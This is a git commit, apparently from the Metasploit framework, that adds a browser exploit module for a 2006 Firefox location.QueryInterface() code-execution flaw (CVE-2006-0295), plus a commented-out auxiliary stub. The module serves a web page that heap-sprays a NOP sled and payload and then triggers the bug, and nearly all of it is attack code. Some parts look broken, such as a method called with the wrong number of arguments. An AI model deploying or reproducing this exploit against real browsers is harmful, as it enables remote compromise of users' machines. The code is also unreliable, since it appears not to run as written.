More aux, first hack on multi-target firefox exploit
git-svn-id: file:///home/svn/incoming/trunk@3565 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
5411701d3f
commit
05bda2529a
|
@ -0,0 +1,15 @@
|
|||
#module Msf
|
||||
#
|
||||
###
|
||||
#
|
||||
# This module provides methods for establish a connection to a remote host and
|
||||
# communicating with it.
|
||||
#
|
||||
###
|
||||
#module Auxiliary::Remote::Tcp
|
||||
#
|
||||
# include Exploit::Remote::Tcp
|
||||
#
|
||||
#end
|
||||
#end
|
||||
|
|
@ -0,0 +1,140 @@
|
|||
require 'msf/core'
|
||||
|
||||
module Msf
|
||||
|
||||
class Exploits::Multi::Browser::Firefox_QueryInterface < Msf::Exploit::Remote
|
||||
|
||||
#
|
||||
# This module acts as an HTTP server
|
||||
#
|
||||
include Exploit::Remote::HttpServer
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Firefox location.QueryInterface() Code Execution (Mac OS X)',
|
||||
'Description' => %q{
|
||||
This module exploits a code execution vulnerability in the Mozilla
|
||||
Firefox browser. To reliably exploit this vulnerability, we need to fill
|
||||
almost a gigabyte of memory with our nop sled and payload. This module has
|
||||
been tested on OS X 10.3 with the stock Firefox 1.5.0 package.
|
||||
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'hdm',
|
||||
],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2006-0295'],
|
||||
['BID', '16476'],
|
||||
['URL', 'http://www.mozilla.org/security/announce/mfsa2006-04.html'],
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000 + (rand(256).to_i * 4),
|
||||
'BadChars' => "\x00",
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Firefox 1.5.0.0 Mac OS X',
|
||||
{
|
||||
'Platform' => 'osx',
|
||||
'Arch' => ARCH_PPC
|
||||
}
|
||||
],
|
||||
|
||||
[ 'Firefox 1.5.0.0 Linux',
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Arch' => ARCH_X86,
|
||||
}
|
||||
],
|
||||
],
|
||||
'DisclosureDate' => 'Feb 02 2006'
|
||||
))
|
||||
end
|
||||
|
||||
def check_dependencies
|
||||
use_zlib
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
|
||||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
|
||||
|
||||
# Transmit the response to the client
|
||||
send_response(cli, generate_html(p), { 'Content-Type' => 'text/html' })
|
||||
|
||||
handler(cli)
|
||||
end
|
||||
|
||||
def generate_html(payload, target)
|
||||
|
||||
enc_code = unescape_encode(payload.encoded)
|
||||
enc_nops = unescape_encode(make_nops(4))
|
||||
|
||||
return %Q|
|
||||
<html>
|
||||
<head>
|
||||
<title>One second please...</title>
|
||||
<script language="javascript">
|
||||
|
||||
function BodyOnLoad() {
|
||||
h = FillHeap();
|
||||
location.QueryInterface(eval("Components.interfaces.nsIClassInfo"));
|
||||
};
|
||||
|
||||
function FillHeap() {
|
||||
// Filler
|
||||
var m = "";
|
||||
var h = "";
|
||||
var a = 0;
|
||||
|
||||
// Nop sled
|
||||
for(a=0; a<(1024*256); a++)
|
||||
m += unescape("#{enc_nops}");
|
||||
|
||||
// Payload
|
||||
m += unescape("#{enc_code}");
|
||||
|
||||
// Repeat
|
||||
for(a=0; a<1024; a++)
|
||||
h += m;
|
||||
|
||||
// Return
|
||||
return h;
|
||||
}
|
||||
</script>
|
||||
</head>
|
||||
<body onload="BodyOnLoad()">
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
end
|
||||
|
||||
def unescape_encode(data)
|
||||
data << "\x41" if (data % 2 != 0)
|
||||
dptr = 0
|
||||
buff = ''
|
||||
while (dptr < data.length)
|
||||
c1 = data[dptr]
|
||||
dptr += 1
|
||||
c2 = data[dptr]
|
||||
dptr += 1
|
||||
|
||||
if (Rex::Arch.endian(target.arch) == ENDIAN_LITTLE)
|
||||
buff << sprintf('%%u%.2x%.2x', c2, c1)
|
||||
else
|
||||
buff << sprintf('%%u%.2x%.2x', c1, c2)
|
||||
end
|
||||
end
|
||||
return buff
|
||||
end
|
||||
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue